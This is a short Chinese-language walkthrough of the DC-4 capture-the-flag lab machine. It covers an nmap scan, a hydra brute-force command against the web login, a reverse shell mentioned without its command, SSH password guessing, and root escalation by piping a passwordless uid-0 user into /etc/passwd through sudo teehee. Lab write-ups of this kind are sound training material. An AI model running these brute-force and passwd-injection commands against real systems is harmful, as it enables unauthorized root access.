环境配置
攻击机:Kali
IP:192.138.247.129
靶机:DC-4
IP:192.168.247.135
信息收集
nmap扫描一下
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 22:09 EST
Nmap scan report for 192.168.247.135
Host is up (0.00088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:D9:BB:04 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.88 ms 192.168.247.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds
发现开发的是22,80端口
漏洞利用
利用九头蛇,爆一下
输入:hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.247.135
http-post-form “/login.php:username=USER&password=PASS:S=logout”
-F
登入
这个时候可以利用反弹shell
监听成功
在jim目录中发现一个文本,感觉是可以利用ssh,爆破进入
成功进入
权力提升
找到了密码,因为jim什么sudo权限都没有,所以我们要找到其他用户的sudo权限,来进行判断
发现这个地方有一个权限是关于teehee的
利用-a
输入:echo “hacker::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
就是把一个没有密码的用户hacker,并且是这个用户具有root权限,再登入到这个用户的时侯,就转换成为root用户
成功
总结
1)九头蛇利用
2)ssh连接
3)teehee提升权力
正如树枝和树干连接在一起那样,脱离树干的树枝很快就会枯死。——奥涅格